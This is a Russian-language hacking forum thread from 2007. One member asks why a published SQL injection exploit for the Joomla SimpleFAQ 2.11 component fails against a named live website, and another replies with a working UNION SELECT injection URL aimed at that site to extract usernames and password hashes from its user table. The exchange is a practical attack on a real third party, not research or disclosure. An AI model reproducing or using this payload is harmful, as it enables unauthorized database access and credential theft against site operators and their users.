SimpleFAQ V2.11???

Discussion in 'Уязвимости' started by fly, 23 Aug 2007.

  1. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Есть сайт http://www.buzzibuzz.com/fr/
    в Joomle нашли баг http://milw0rm.com/exploits/4296, в SimpleFAQ V2.11.
    Версия этого модуля на buzzibuzz.com V2.11, но скуля не выводит логины и хеши, а вылетает ошибка!
    В чем проблема?

    Ошибка

    Code:
    Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/buzzzcom/public_html/fr/components/com_simplefaq/simplefaq.php on line 150
    
     
  2. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    Лови ,с тебя +++

    http://www.buzzibuzz.com/fr/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*

    P.S: Joomle уязвимы все , только нужно уметь правельно реализовать уязвимость ))
     
    #2 _-Ramos-_, 23 Aug 2007
    Last edited: 23 Aug 2007
    2 people like this.